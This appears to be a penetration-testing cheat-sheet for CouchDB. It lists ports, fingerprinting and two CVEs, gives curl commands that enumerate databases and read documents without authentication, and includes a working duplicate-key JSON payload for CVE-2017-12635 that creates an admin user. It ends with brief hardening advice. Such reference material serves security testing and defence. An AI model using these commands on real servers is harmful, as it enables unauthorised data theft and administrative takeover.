CouchDB
Document database with a full REST API on 5984. Often unauthenticated; CVE-2017-12635 escalates any user to admin, and CVE-2022-24706 reaches the Erlang node for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
5984 | tcp | CouchDB HTTP API |
6984 | tcp | CouchDB HTTPS |
Fingerprint
- GET / returns {"couchdb":"Welcome","version":"..."}
- /_utils serves the Fauxton web admin
Default / weak creds
admin party (no auth) on older/default installs
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2017-12635 | JSON parser diff → privilege escalation to admin |
| CVE-2022-24706 | Erlang cookie/distribution → unauthenticated RCE |
Exploitation primitives
- List all DBs and read docs unauthenticated (often holds app creds)
- CVE-2017-12635: create an admin user via duplicate-key JSON, then use the admin API
- CVE-2022-24706: reach the Erlang node for RCE on default configs
Overview
CouchDB on 5984 exposes everything over HTTP. Default installs are wide open, and two CVEs turn it from “read the data” into full admin/RCE.
Enumeration
Banner + version:
curl http://<TARGET>:5984/List databases:
curl http://<TARGET>:5984/_all_dbsRead a database’s docs:
curl http://<TARGET>:5984/<db>/_all_docs?include_docs=truePrivilege escalation (CVE-2017-12635)
Create an admin via the duplicate-roles JSON bug:
curl -X PUT http://<TARGET>:5984/_users/org.couchdb.user:hacker -d '{"type":"user","name":"hacker","password":"pwn","roles":["_admin"],"roles":[]}' -H "Content-Type: application/json"Hardening
Require authentication, bind to localhost where possible, protect the Erlang cookie, and patch to ≥ 3.x.